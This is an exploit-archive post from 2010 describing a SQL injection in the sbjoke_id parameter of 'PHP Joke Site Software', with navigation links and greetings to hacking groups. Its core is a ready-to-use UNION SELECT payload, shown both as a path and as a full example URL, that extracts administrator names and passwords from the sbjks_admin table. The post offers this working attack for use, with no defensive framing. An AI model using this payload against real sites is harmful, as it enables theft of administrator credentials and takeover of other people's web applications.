PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Joke Site Software (sbjoke_id) SQL Injection Vuln
# Published : 2010-09-01
# Author : BorN To KiLL
# Previous Title : Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities
# Next Title : MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day

[#] Title:    PHP Joke Site Software (sbjoke_id) SQL Injection Vuln

[#] Link:    http://www.softbizscripts.com/jokes-script-features.php

[#] Author:    BorN To K!LL - h4ck3r

[#] 3xploit:

/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] 3xample:

http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] Greetings:

[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...